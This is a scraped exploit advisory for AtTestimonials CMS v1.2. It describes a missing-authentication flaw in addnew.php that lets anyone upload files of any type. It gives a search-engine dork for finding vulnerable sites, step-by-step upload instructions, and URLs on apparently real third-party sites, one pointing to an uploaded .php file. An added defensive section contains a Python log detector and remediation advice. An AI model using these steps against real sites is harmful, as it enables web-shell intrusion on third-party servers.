## https://sploitus.com/exploit?id=PACKETSTORM:173420
====================================================================================================================================  
| # Title : AtTestimonials CMS v1.2 Missing Authentication Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |  
| # Vendor : http://www.dl.persianscript.ir/script/atmanager-system(PersianScript.ir).zip |  
| # Dork : © Copyright 2009 : All Rights Reserved Programmed and Developed by themeflash.com |  
====================================================================================================================================  
  
poc :  
  
[+] Dork in Google or another search engine.  
  
[+] The administrative interface appears to be missing authentication.  
  
[+] Use payload : /addnew.php  
  
[+] Add New Testimonials  
  
[+] http://wccpavingcouk/testimonials/addnew.php  
  
[+] Attach any file extension  
  
[+] http://dfwcarfixcom/testimonials/upload/084145ahmad.php  
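
Detection for the pattern described above, as an added example that is not part of the original advisory: it scans web access logs for POSTs to addnew.php and for script files requested from the upload directory. Assumptions: combined log format, a 30-minute correlation window, the extension list, and the function names are all hypothetical; the log lines are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jul/2023:08:41:40 +0000] "GET /testimonials/addnew.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jul/2023:08:41:45 +0000] "POST /testimonials/addnew.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jul/2023:08:42:10 +0000] "GET /testimonials/upload/084145sample.php HTTP/1.1" 200 17 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jul/2023:09:00:00 +0000] "GET /testimonials/upload/photo.jpg HTTP/1.1" 200 40960 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jul/2023:09:05:00 +0000] "GET /testimonials/upload/old.phtml HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Extensions commonly mapped to the PHP handler (assumed list; adjust to the server config).
SCRIPT_EXT = re.compile(r'/upload/[^/?]+\.(?:php\d?|phtml|phar)(?:$|[?/])', re.I)
WINDOW = timedelta(minutes=30)  # assumed correlation window

def parse(log_text):
    """Yield (ip, time, method, path, status) for each parseable log line."""
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if m:
            ip, ts, method, path, status = m.groups()
            yield ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def find_upload_abuse(log_text):
    """Return (severity, ip, path) findings for the addnew.php -> upload/ pattern."""
    last_post = {}  # client IP -> time of its last successful POST to addnew.php
    findings = []
    for ip, when, method, path, status in parse(log_text):
        if method == "POST" and path.split("?")[0].endswith("/addnew.php") and status < 400:
            last_post[ip] = when
            findings.append(("review", ip, path))
        elif SCRIPT_EXT.search(path):
            if status < 400:
                # A script in the upload directory was served, so it likely executed.
                recent = ip in last_post and when - last_post[ip] <= WINDOW
                findings.append(("critical" if recent else "high", ip, path))
            else:
                findings.append(("probe", ip, path))
    return findings

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(*finding)
```

A "critical" or "high" finding means a script under upload/ was served; the corresponding fixes are requiring a session check in addnew.php, allowlisting upload extensions, and disabling script execution in the upload directory.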
  
  
Greetings to :=================================================================  
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |  
===============================================================================